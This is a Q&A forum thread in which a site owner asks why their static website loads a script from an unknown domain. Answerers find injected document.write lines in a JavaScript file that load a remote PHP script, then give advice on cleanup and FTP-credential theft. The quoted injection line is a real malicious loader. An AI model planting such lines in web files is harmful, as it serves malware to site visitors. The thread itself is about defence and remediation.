tags:

views:

178

answers:

5
+1  Q: 

Mysterious url in our html website

Dear Community members,

The home-page of our static html website http://www.iffort.com is transferring data from a mysterious website rawalrohi.com. You can check this by going to iffort.com and noticing the footer there. It says transferring data from rawalrohi.com.

From our side we did the following things to rectify the issue

a.) Analyze the source-code of all pages. We checked the code and found out that a script src=http://rawalrohi.com/images/ART.php was inserted in all pages. We removed this script from all the ‘html’ pages of the website

b.)Next we spoke to the hosting company, they said they can provide us a back up of the site. We have the backup but haven’t used it to restore the site.

c.)Lastly, we have changed the FTP password because we were told that somebody could have hacked our FTP password.

Despite doing this the home-page still says transferring data from rawalrohi.com. The view source doesn’t reveal the URL. This is slowing down our website.

Any help is greatly appreciated.

+3  A: 

Your page references a file called "js/hyperlinked_Images.js" Have a look at this file, right near the bottom:

...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');

Now if you'll excuse me, I'm go to run a quick AV scan on my system ;)

FrustratedWithFormsDesigner  2009-10-21 03:12:00
Thanks for the reply. Are we supposed to remove that as well? I mean the js file?
Daksh  2009-10-21 03:15:47
Yes you probably should remove that, unless you know why it's there.
FrustratedWithFormsDesigner  2009-10-21 03:18:32
Just removed the last 3 lines in that code. Uploaded the new file. Anything else which needs to be edited?
Daksh  2009-10-21 03:30:20
I'm not sure, but it sounds like you need to do a very detailed audit of the files on your server. Maybe search all files in your hosting directory for "rawalrohi" and clean them up.The other option would be to just reformat your server and reinstall your server software and reinstall the site, assuming your backup of the site is not tainted. The main problem with this approach is the downtime. Also, not all hosting companies will let you do that (or do it for you).
FrustratedWithFormsDesigner  2009-10-21 03:34:23
Yeah you are right a lengthy process. Right now I searched hosting directory for rawalrohi and found nothing.
Daksh  2009-10-21 03:43:48
Btw they provided backup of 15th October.
Daksh  2009-10-21 03:45:03
A: 

I just recently saw this on a clients website, a different url but same type of code injection was in all of their files. To fix the problem, I download the site and I used Visual Studio to do a sitewide "find & replace" on the string. This solved the problem for me. I suggest you do something similar for all files, you might have missed one. My clients site had html/htm/aspx files that were all infected, ISP made the same statement that the FTP password was probably compromised...

Zachary  2009-10-21 03:13:05
Thanks Zachari. The hosting companies are pretty reckless in their behavior. Will see what we can do, will perhaps download all the code.
Daksh  2009-10-21 03:16:31
A: 

Make sure you on your antivirus. Whenever the your website loading funny external script like adware, spyware, your antivirus will alert you.

i need help  2009-10-21 03:28:44
Using Mcafee antivirus. it is always on. Never alerted me about anything suspicious :(
Daksh  2009-10-21 03:30:52
Antivirus apps will never catch everything. It's always possible for some things to get through them.
FrustratedWithFormsDesigner  2009-10-21 03:35:14
+1  A: 

make sure you don't use one FTP account for everything, control the FTP user control, it will help you to manage your website.

Shiro  2009-10-21 03:30:53
Hi Shiro - Sorry can you please elaborate this?
Daksh  2009-10-21 03:32:28
+1  A: 

I've seen similar behaviour a while back. In that specific case, the ftp-password was compromised: it was read from the clients desktop PC by malware that collected stored ftp passwords.

We found this out only after the password was changed and compromised again within a few days.

So make sure you scan all machines that 'know' the ftp password with a decent AV-scanner.

Jacco  2009-10-21 13:33:00

related questions

Autosizing Textarea
Regular expression for parsing links from a webpage?
What are good tools for creating compiled HTML help files (.chm)?
Looking for WYSIWYG HTML editor
Any reason not to start using the HTML 5 doctype?
HTML comments break down
HTML Comments Markup
Setting a div's height in HTML with CSS
Wrapping lists into columns
Is a "Confirm Email" input good practice when user changes email address?
<XMP> Tag
HTML version choice
Options for HTML scraping?
How do you disable browser Autocomplete on web form field / input tag?
How do I make a checkbox toggle from clicking on the text label as well?
Html CSS Editor
Wordpress theme development offline tools
How do I give my web sites an icon for iPhone?
In HTML, how to word-break on a dash?
Detecting font in JavaScript
How do you test layout design across multiple browsers/OSs?
How do I print an HTML document from a web service?
Multiple submit buttons on a HTML form
How can I determine a web user's time zone?
Why doesn't the percentage width child in absolutely positioned parent work in IE7?